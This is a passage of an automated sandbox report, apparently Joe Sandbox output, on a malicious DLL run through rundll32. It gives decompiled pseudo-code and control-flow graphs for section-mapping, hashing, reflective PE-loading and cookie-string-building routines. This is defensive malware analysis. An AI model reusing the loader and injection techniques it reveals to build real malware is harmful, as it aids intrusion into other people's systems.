                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 335 7fef74d5fe6-7fef74d5feb 336 7fef74d5fdd-7fef74d5fe1 335->336 337 7fef74d5fed-7fef74d620c 335->337 338 7fef74d66d4-7fef74d66db 336->338 340 7fef74d624b-7fef74d625b 337->340 341 7fef74d620e-7fef74d6215 NtCreateSection 337->341 342 7fef74d625d-7fef74d626f 340->342 343 7fef74d621e-7fef74d622d 340->343 341->343 344 7fef74d622f-7fef74d623a 342->344 343->342 343->344 345 7fef74d66c5-7fef74d66d2 344->345 345->338 346 7fef74d66a7-7fef74d66bb NtMapViewOfSection 345->346 346->345
                                                  C-Code - Quality: 100%
                                                  			E000007FE7FEF74D5FE6(void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a88, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344, intOrPtr _a448) {
				intOrPtr _t41;

				if (_a88 < 0) goto 0xf74d5fdd;
				_t41 = _a448;
				_a344 = 0x18f;
				_a344 = _a344 + 0xff;
				_a324 = 0x1d29;
				_a324 = _a324 + 0x3c;
				if (__ecx == __ecx) goto 0xf74d6042;
				_a336 = 0x7b;
				_a336 = _a336;
				if (__edx == __edx) goto 0xf74d608a;
				_a328 = 6;
				_a328 = _a328 + 0x27;
				if (__ebx == __ebx) goto 0xf74d6059;
				_a332 = 0x35;
				_a332 = _a332 + 0x17;
				if (_t41 == _t41) goto 0xf74d602b;
				_a312 = 0x19cc;
				_a312 = _a312 + 0xa0;
				if (__ebx == __ebx) goto 0xf74d60a5;
				_a340 = 0xd9;
				_a340 = _a340 + 0x81;
				goto L1;
				_a316 = 0x5c;
				_a316 = _a316 + 0x8f;
				if (__cx == __cx) goto 0xf74d60d7;
				_a308 = 7;
				_a308 = _a308 + 0x12;
				if (__ch == __ch) goto 0xf74d6070;
				_a320 = 0x24b;
				_a320 = _a320 + 0x30;
				if (__dl == __dl) goto L2;
				__eax =  *((intOrPtr*)(__rsp + 0x70 + _a80 * 4));
				if (__eax - 0x1f4 <= 0) goto 0xf74d60f2;
				_t38 = __r10;
				__r10 = __rsp;
				__rsp = _t38;
				__r11 = __r11 << 0x40;
				return __eax;
			}




                                                  0x7fef74d5feb
                                                  0x7fef74d5fed
                                                  0x7fef74d5ff9
                                                  0x7fef74d6004
                                                  0x7fef74d6014
                                                  0x7fef74d601f
                                                  0x7fef74d6029
                                                  0x7fef74d602b
                                                  0x7fef74d6036
                                                  0x7fef74d6040
                                                  0x7fef74d6042
                                                  0x7fef74d604d
                                                  0x7fef74d6057
                                                  0x7fef74d6059
                                                  0x7fef74d6064
                                                  0x7fef74d606e
                                                  0x7fef74d6070
                                                  0x7fef74d607b
                                                  0x7fef74d6088
                                                  0x7fef74d608a
                                                  0x7fef74d6095
                                                  0x7fef74d60a0
                                                  0x7fef74d60a5
                                                  0x7fef74d60b0
                                                  0x7fef74d60be
                                                  0x7fef74d60c0
                                                  0x7fef74d60cb
                                                  0x7fef74d60d5
                                                  0x7fef74d60d7
                                                  0x7fef74d60e2
                                                  0x7fef74d60ec
                                                  0x7fef74d60f7
                                                  0x7fef74d6105
                                                  0x7fef74d610e
                                                  0x7fef74d610e
                                                  0x7fef74d610e
                                                  0x7fef74d6116
                                                  0x7fef74d611b

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
                                                  • Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID:
                                                  • API String ID: 2449625523-0
                                                  • Opcode ID: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
                                                  • Instruction ID: 3e9ba125b97d1e202216d4ae020126a8f30c6ffa4e134db01a81879d11b5550d
                                                  • Opcode Fuzzy Hash: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
                                                  • Instruction Fuzzy Hash: 2311987292C6C5C6E7F09F54E0547ABABE2F384394F500035F6DA46AA8DB7DD5848F02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000007FEF74D2CF7 Relevance: 3.0, APIs: 2, Instructions: 27encryptionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 348 7fef74d2cf7-7fef74d2cff 349 7fef74d2cda-7fef74d2cf2 CryptCreateHash 348->349 350 7fef74d2d01-7fef74d2d0d CryptAcquireContextW 348->350 354 7fef74d313c-7fef74d313e 349->354 352 7fef74d2faa-7fef74d2fc4 350->352 353 7fef74d2fb9-7fef74d2fbb 350->353 353->352 355 7fef74d2fbd-7fef74d2fbf 353->355 357 7fef74d3134 354->357 358 7fef74d3140-7fef74d3142 354->358 355->354 359 7fef74d3283 355->359 357->354 358->359 360 7fef74d3352-7fef74d3368 359->360 362 7fef74d336a-7fef74d3380 360->362 363 7fef74d3307-7fef74d331c 360->363 366 7fef74d32ab-7fef74d32c1 362->366 367 7fef74d3386-7fef74d338e 362->367 364 7fef74d3322-7fef74d3338 363->364 365 7fef74d328f-7fef74d32a5 363->365 368 7fef74d333a-7fef74d3350 364->368 370 7fef74d32f0-7fef74d3305 364->370 365->362 365->366 366->368 369 7fef74d32c3-7fef74d32cb 366->369 372 7fef74d339e-7fef74d33b4 367->372 368->360 368->364 371 7fef74d32db-7fef74d32ee 369->371 370->363 370->371 371->369 373 7fef74d33b6-7fef74d33ce 372->373 374 7fef74d33d0-7fef74d33e6 372->374 373->374 375 7fef74d33ff-7fef74d3417 373->375 376 7fef74d33e8-7fef74d33fd 374->376 377 7fef74d3450-7fef74d3465 374->377 375->376 379 7fef74d3419-7fef74d342f 375->379 376->375 378 7fef74d346b-7fef74d3483 376->378 377->373 377->378 378->379 380 7fef74d3485-7fef74d35d5 378->380 379->367 381 7fef74d3434-7fef74d344a 379->381 386 7fef74d35d7-7fef74d35ed 380->386 387 7fef74d3631-7fef74d3647 380->387 381->372 381->377 389 7fef74d35f7-7fef74d35ff 386->389 390 7fef74d35ef-7fef74d35f5 386->390 387->386 388 7fef74d3649-7fef74d364b 387->388 391 7fef74d3607 389->391 390->388 390->389 391->391
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
                                                  • Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Crypt$AcquireContextCreateHash
                                                  • String ID:
                                                  • API String ID: 1914063823-0
                                                  • Opcode ID: 9328c7aaf945543188686a8cb83c328452d0d61bf2d104c301b4851cb1c44e76
                                                  • Instruction ID: c9ec193665597158924b64c56011d64866868064075c770999a4e8ded5d0856a
                                                  • Opcode Fuzzy Hash: 9328c7aaf945543188686a8cb83c328452d0d61bf2d104c301b4851cb1c44e76
                                                  • Instruction Fuzzy Hash: 76F0FE22E2D547D2F6F08F11E4103BF92E1E795740F540435F6CF42AA8EB3DE955A600
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000007FEF74D2CCA Relevance: 1.6, APIs: 1, Instructions: 65encryptionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 432 7fef74d2cca-7fef74d2f9d CryptCreateHash 434 7fef74d2f68-7fef74d3283 432->434 435 7fef74d2f9f-7fef74d30f4 432->435 456 7fef74d3352-7fef74d3368 434->456 438 7fef74d3116-7fef74d3128 435->438 439 7fef74d30f6 435->439 441 7fef74d3698-7fef74d36a2 438->441 439->439 442 7fef74d36a4-7fef74d36ae 441->442 443 7fef74d36b0-7fef74d36bf call 7fef74d7947 441->443 442->443 445 7fef74d36c1-7fef74d36ce 442->445 443->442 443->445 448 7fef74d36d0-7fef74d36d5 445->448 449 7fef74d367f-7fef74d3696 445->449 454 7fef74d36dd-7fef74d36e5 448->454 449->441 453 7fef74d3671-7fef74d367d 449->453 453->449 453->454 454->448 457 7fef74d336a-7fef74d3380 456->457 458 7fef74d3307-7fef74d331c 456->458 461 7fef74d32ab-7fef74d32c1 457->461 462 7fef74d3386-7fef74d338e 457->462 459 7fef74d3322-7fef74d3338 458->459 460 7fef74d328f-7fef74d32a5 458->460 463 7fef74d333a-7fef74d3350 459->463 465 7fef74d32f0-7fef74d3305 459->465 460->457 460->461 461->463 464 7fef74d32c3-7fef74d32cb 461->464 467 7fef74d339e-7fef74d33b4 462->467 463->456 463->459 466 7fef74d32db-7fef74d32ee 464->466 465->458 465->466 466->464 468 7fef74d33b6-7fef74d33ce 467->468 469 7fef74d33d0-7fef74d33e6 467->469 468->469 470 7fef74d33ff-7fef74d3417 468->470 471 7fef74d33e8-7fef74d33fd 469->471 472 7fef74d3450-7fef74d3465 469->472 470->471 474 7fef74d3419-7fef74d342f 470->474 471->470 473 7fef74d346b-7fef74d3483 471->473 472->468 472->473 473->474 475 7fef74d3485-7fef74d35d5 473->475 474->462 476 7fef74d3434-7fef74d344a 474->476 481 7fef74d35d7-7fef74d35ed 475->481 482 7fef74d3631-7fef74d3647 475->482 476->467 476->472 484 7fef74d35f7-7fef74d35ff 481->484 485 7fef74d35ef-7fef74d35f5 481->485 482->481 483 7fef74d3649-7fef74d364b 482->483 486 7fef74d3607 484->486 485->483 485->484 486->486
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
                                                  • Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateCryptHash
                                                  • String ID:
                                                  • API String ID: 4184778727-0
                                                  • Opcode ID: 1b2df4a2d971ec85693729c80128cdf9c680fc0664a4aaac409bd98b765b1bdf
                                                  • Instruction ID: a7b62e0e4bf6e52d8e0cce57ed447bc69e40cf86a518eceb9d84c833f6ae453a
                                                  • Opcode Fuzzy Hash: 1b2df4a2d971ec85693729c80128cdf9c680fc0664a4aaac409bd98b765b1bdf
                                                  • Instruction Fuzzy Hash: FD217162D2C182C6F6F08E94D0043BB92E1EB91300F940039F6CB87BB4EA3DE8419B01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000007FEF74D2CDA Relevance: 1.5, APIs: 1, Instructions: 13encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
                                                  • Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateCryptHash
                                                  • String ID:
                                                  • API String ID: 4184778727-0
                                                  • Opcode ID: 6c0d0b01144992e9ee5506c314bfe315ee5ded7aa6eeff1a2f840e8b65ebe874
                                                  • Instruction ID: 04ff2314b4382c927438a901e625bcf0217fa51f0f41517509c9b2c9e98b86a7
                                                  • Opcode Fuzzy Hash: 6c0d0b01144992e9ee5506c314bfe315ee5ded7aa6eeff1a2f840e8b65ebe874
                                                  • Instruction Fuzzy Hash: EFD09212E2D14BC2FAE44A12A92073B85D2ABE1745F249031F5DA469A8DA3CE8119200
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180002860 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 40%
                                                  			E00000001180002860(void* __ecx, void* __edx, void* __edi, long long* __rax, long long __rbx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				int _t23;
				int _t24;
				void* _t30;
				long long* _t41;
				void* _t46;
				signed long long _t47;
				signed long long _t48;
				long long* _t69;
				void* _t71;

				_t41 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t71 = __r8;
				GetProcessHeap();
				r8d = 0x2001;
				RtlAllocateHeap(??, ??, ??); // executed
				_t69 = __rax;
				if (__rax == 0) goto 0x80002959;
				r9d = __ecx;
				_t23 = wsprintfW(??, ??);
				r9d = __edx;
				_t24 = wsprintfW(??, ??);
				r9d = E00000001180001484(_t24, __rax, L"%s%u");
				_t46 = _t23 + _t24 + wsprintfW(??, ??);
				r9d = E0000000118000108C(__rax, _t46, __r8);
				_t47 = _t46 + wsprintfW(??, ??);
				E00000001180001904(__rax, _t47, __rax + _t47 * 2, _t71);
				_t48 = _t47 + __rax;
				_t30 = E000000011800027B4(__rax, _t48, __rax + _t48 * 2);
				_t49 = _t48 + __rax;
				E00000001180002018(_t30, _t48 + __rax, __rax + (_t48 + __rax) * 2, _t71, __rax, _t71);
				return E0000000118000133C(_t49 + _t41, _t69 + (_t49 + _t41) * 2, _t71, ":");
			}













                                                  0x180002860
                                                  0x180002860
                                                  0x180002865
                                                  0x18000286a
                                                  0x180002874
                                                  0x18000287b
                                                  0x180002886
                                                  0x18000288f
                                                  0x180002895
                                                  0x18000289b
                                                  0x1800028a1
                                                  0x1800028b5
                                                  0x1800028be
                                                  0x1800028d6
                                                  0x1800028eb
                                                  0x180002901
                                                  0x18000290d
                                                  0x180002923
                                                  0x18000292a
                                                  0x18000292f
                                                  0x180002936
                                                  0x18000293b
                                                  0x180002945
                                                  0x18000296d

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wsprintf$Heap$Process$AddressLibraryLoadProc$AdaptersAllocInfoName$AllocateComputerCount64FreeInformationQuerySystemTickUser
                                                  • String ID: %s%u$Cookie: __gads=
                                                  • API String ID: 392523097-3007860590
                                                  • Opcode ID: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
                                                  • Instruction ID: 8f6dff4a45bc758f9ad86f1329c8408aa2d07b8871dc2bc0e96f96c00fe38273
                                                  • Opcode Fuzzy Hash: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
                                                  • Instruction Fuzzy Hash: 2C214872740A0996EB92DB55F8543E87360BB5CBC1F848129AB4D57772EE3CC62DC340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180001BD4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 143 180001bd4-180001c0c LoadLibraryA GetProcAddress 145 180001c15-180001c25 143->145 146 180001c0e-180001c13 GetNativeSystemInfo 143->146 146->145
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                  • String ID: GetNativeSystemInfo$KERNEL32.DLL
                                                  • API String ID: 2103483237-4162215167
                                                  • Opcode ID: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
                                                  • Instruction ID: 8e61e42ac17d5e92d5409a7507b4c0ea04a19fa1e2651f3f55c474f49308d06d
                                                  • Opcode Fuzzy Hash: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
                                                  • Instruction Fuzzy Hash: 0BE06D72B24509D2EB93EB20E8543D93360FB9C780F848221A54E026A4EF2CD78DC740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00120000 Relevance: 6.7, APIs: 4, Instructions: 735memorylibraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 192 120000-12008f call 120618 * 6 205 120095-120098 192->205 206 1205fa 192->206 205->206 207 12009e-1200a1 205->207 208 1205fc-120616 206->208 207->206 209 1200a7-1200aa 207->209 209->206 210 1200b0-1200b3 209->210 210->206 211 1200b9-1200bc 210->211 211->206 212 1200c2-1200d0 211->212 212->206 213 1200d6-1200df 212->213 213->206 214 1200e5-1200ed 213->214 214->206 215 1200f3-120101 214->215 216 120103-120108 215->216 217 120127-120159 GetNativeSystemInfo 215->217 218 12010b-120125 216->218 217->206 219 12015f-12017b VirtualAlloc 217->219 218->217 218->218 220 120192-12019d 219->220 221 12017d-120190 219->221 222 1201b0-1201cc 220->222 223 12019f-1201ae 220->223 221->220 225 12020a-120217 222->225 226 1201ce-1201cf 222->226 223->222 223->223 228 1202d2-1202d9 225->228 229 12021d-120224 225->229 227 1201d1-1201d7 226->227 230 1201f9-120208 227->230 231 1201d9-1201f7 227->231 232 120345-12034c 228->232 233 1202db-1202eb 228->233 229->228 234 12022a-120237 229->234 230->225 230->227 231->230 231->231 235 1203c0-1203d1 232->235 236 12034e-120361 232->236 233->232 237 1202ed-1202ee 233->237 234->228 238 12023d-120244 234->238 239 1204e1-1204fa 235->239 240 1203d7-1203e0 235->240 236->235 241 120363-120364 236->241 242 1202f1-12030a LoadLibraryA 237->242 243 120247-12024b 238->243 259 120521-120525 239->259 260 1204fc-120504 239->260 244 1203e5-1203e7 240->244 245 120367-120380 241->245 246 12032c-120332 242->246 247 1202ba-1202c4 243->247 251 1204cc-1204db 244->251 252 1203ed-1203f8 244->252 273 1203a8-1203ab 245->273 249 120334-12033f 246->249 250 12030c 246->250 253 1202c6-1202cc 247->253 254 12024d-120261 247->254 249->242 261 120341-120342 249->261 255 120313-120318 250->255 256 12030e-120311 250->256 251->239 251->244 262 120411-120413 252->262 263 1203fa-1203fd 252->263 253->228 253->243 257 120263-120283 254->257 258 120285-120289 254->258 265 12031a-120329 255->265 256->265 266 1202b7-1202b8 257->266 267 12028b-12028d 258->267 268 12028f-120293 258->268 270 120527-120540 259->270 271 120544-12054b 259->271 269 120508-12050e 260->269 261->232 274 120415-120418 262->274 275 12044e-120451 262->275 263->262 272 1203ff-120401 263->272 265->246 266->247 278 1202aa-1202b4 267->278 279 1202a1-1202a5 268->279 280 120295-12029f 268->280 269->259 281 120510-12051f 269->281 270->271 284 120551-120569 271->284 285 1205f5-1205f8 271->285 272->262 288 120403-12040c 272->288 282 120382-120389 273->282 283 1203ad-1203ba 273->283 276 120424-120426 274->276 277 12041a-12041c 274->277 286 120453-120455 275->286 287 12045f-120461 275->287 276->275 293 120428-12042b 276->293 277->276 292 12041e-120422 277->292 278->266 279->266 289 1202a7 279->289 280->278 281->269 298 120390-120395 282->298 299 12038b-12038e 282->299 283->245 290 1203bc-1203bd 283->290 295 12057b-12058b 284->295 296 12056b-120579 284->296 285->208 286->287 297 120457-12045d 286->297 300 120463-120466 287->300 301 1204a7-1204a8 287->301 291 1204ab-1204b2 288->291 289->278 290->235 305 1204b4-1204ba 291->305 306 1204bd-1204ca VirtualProtect 291->306 307 120487-12048b 292->307 308 120437-120439 293->308 309 12042d-12042f 293->309 295->285 311 12058d-12058e 295->311 296->295 296->296 297->307 302 120397-1203a5 298->302 299->302 303 120474-120476 300->303 304 120468-12046a 300->304 301->291 302->273 303->301 313 120478-12047b 303->313 304->303 312 12046c-120472 304->312 305->306 306->251 307->291 308->275 315 12043b-12043e 308->315 309->308 314 120431-120435 309->314 316 120590-120594 311->316 312->307 320 12048d-12048f 313->320 321 12047d-12047f 313->321 314->307 322 120440-120442 315->322 323 12044a-12044c 315->323 317 120596-1205a0 316->317 318 1205b5-1205b8 316->318 324 1205a3-1205b3 317->324 325 1205ba-1205bd 318->325 326 1205bf-1205c3 318->326 320->301 328 120491-120494 320->328 321->320 327 120481-120482 321->327 322->323 329 120444-120448 322->329 323->275 323->301 324->318 324->324 325->326 330 1205d3-1205e2 325->330 331 1205e5-1205f3 326->331 332 1205c5-1205cf 326->332 327->307 328->301 333 120496-1204a5 328->333 329->307 330->331 331->285 332->285 334 1205d1 332->334 333->307 334->316
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946492105.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_120000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocInfoLibraryLoadNativeProtectSystem
                                                  • String ID:
                                                  • API String ID: 395219687-0
                                                  • Opcode ID: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
                                                  • Instruction ID: b69346f41ff606e319130c8a8d758b8acfcb3c2cfd8767c1206f7523143e8fcd
                                                  • Opcode Fuzzy Hash: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
                                                  • Instruction Fuzzy Hash: 10120831618E298FCB2EDE58E85567573E1FB58311B25472DD88BC3253EB34EC638681
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180001318 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 392 180001318-18000131c 393 180001329-180001330 392->393 394 180001332-180001334 ExitProcess 393->394 395 18000131e-180001323 SleepEx 393->395 395->393
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcessSleep
                                                  • String ID:
                                                  • API String ID: 911557368-0
                                                  • Opcode ID: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
                                                  • Instruction ID: 6bf3646277ed7659d23c391addaeef7dd43479a1e5d5f4f4aeea11294e6aed9e
                                                  • Opcode Fuzzy Hash: 87f2df61503c43403be47c73b52c885253801360124acf11aa6c9924d5a50bed
                                                  • Instruction Fuzzy Hash: C3D01231200248C7F2DBA721E8183EC3164A308382F90C129A106444E08F380B8C8304
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000007FEF74D36FA Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 396 7fef74d36fa-7fef74d3706 397 7fef74d3708-7fef74d3712 call 7fef74d7947 396->397 398 7fef74d3721-7fef74d372d 396->398 405 7fef74d3845-7fef74d3852 397->405 399 7fef74d36ec-7fef74d36f5 398->399 400 7fef74d372f-7fef74d373b call 7fef74d7947 398->400 403 7fef74d39b9-7fef74d39be 399->403 409 7fef74d373d-7fef74d374b 400->409 410 7fef74d3717-7fef74d371f 400->410 407 7fef74d3854-7fef74d3a3b 405->407 408 7fef74d37ff-7fef74d380c call 7fef74da588 405->408 415 7fef74d3a3d-7fef74d3a43 407->415 416 7fef74d3a4f-7fef74d3a58 407->416 421 7fef74d381a-7fef74d3826 408->421 422 7fef74d380e-7fef74d3818 408->422 412 7fef74d374d-7fef74d3759 409->412 413 7fef74d375b-7fef74d3765 409->413 410->397 412->413 417 7fef74d3767-7fef74d39aa call 7fef74d8d0b 412->417 413->400 413->417 415->416 420 7fef74d39d0-7fef74d39f8 416->420 417->403 429 7fef74d39ac-7fef74d39b2 417->429 421->422 423 7fef74d3828-7fef74d3843 RtlAllocateHeap 421->423 422->421 422->423 423->405 423->407 429->403 431 7fef74d39b4 429->431 431->396 431->403
                                                  C-Code - Quality: 72%
                                                  			E000007FE7FEF74D36FA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __esp, intOrPtr* _a8, intOrPtr* _a16, signed int _a33, char _a36, char _a37, long long _a40, long long _a48, long long _a56, signed int _a64, long long _a72, long long _a80, long long _a88, long long _a96, void* _a136) {
				unsigned int _v48;
				intOrPtr _v64;
				intOrPtr* _v72;
				unsigned int _v80;
				char _v87;
				char _v88;
				long long _v104;
				signed long long _v112;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				signed int _t70;
				signed int _t71;
				intOrPtr _t76;
				signed int _t77;
				signed int _t78;
				void* _t82;
				signed int _t87;
				void* _t92;
				void* _t101;
				long long _t128;
				long long _t129;
				long long _t130;
				long long _t132;
				long long _t133;
				void* _t140;
				void* _t141;
				intOrPtr* _t154;
				long long _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;

				_t92 = __edx;
				_t128 = _a56 + 2;
				if (__esp == __esp) goto 0xf74d3721;
				_t64 = E000007FE7FEF74D7947(_t63, __ebx, _t82, __edx, __edi, __esi, _t128, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
				_a96 = _t128;
				goto 0xf74d3845;
				goto 0xf74d3708;
				_a56 = _t128;
				_t129 = _a40;
				if (_t64 == _t64) goto 0xf74d36ec;
				_t65 = E000007FE7FEF74D7947(_t64, __ebx, 0xd45a1e1f, _t92, __edi, __esi, _t129, _t140, _t141, _t157, _t160, _t162, _t164, _t166, _t168);
				_a88 = _t129;
				if (_t92 == _t92) goto 0xf74d3717;
				 *((intOrPtr*)(_a136 + 8)) = _t65;
				if (__esi == __esi) goto 0xf74d375b;
				r8d = r8d + 2;
				if (0xd45a1e1f == 0xd45a1e1f) goto 0xf74d3767;
				if (0x67cc0818 == 0x67cc0818) goto 0xf74d372f;
				_t143 = _a56;
				E000007FE7FEF74D8D0B(_t65, 0x67cc0818, __esi, _t101, __esp, _t129, _a56,  &_a36, _t156, _t157, _t158, _t160, _t162, _t163, _t164, _t165, _t166, _t167);
				_a96();
				_t87 = _a33;
				E000007FE7FEF74D3D78(_t87, __esp, _t129, _t140, _t143,  &_a36, _t157, _t158, _t162, _t166, _t167);
				if (_t87 == _t87) goto 0xf74d37c0;
				_t70 = _t87;
				if (_t92 == _t92) goto 0xf74d379e;
				_t154 = _a136;
				if (__ebx == __ebx) goto 0xf74d3776;
				_t71 = _t70 << 4;
				_a64 = _t71;
				if (_t71 == _t71) goto 0xf74d3786;
				if ((_a64 | _t71) == (_a64 | _t71)) goto 0xf74d3793;
				_t155 =  *_t154;
				 *(_t155 +  *((intOrPtr*)(_t129 + 0x30))) = _t71;
				goto 0xf74d37d7;
				goto 0xf74d39c6;
				if (_a48 - _t129 >= 0) goto 0xf74d37d7;
				_t130 = _a48;
				goto 0xf74d37f2;
				goto 0xf74d395d;
				_a80 = _t130;
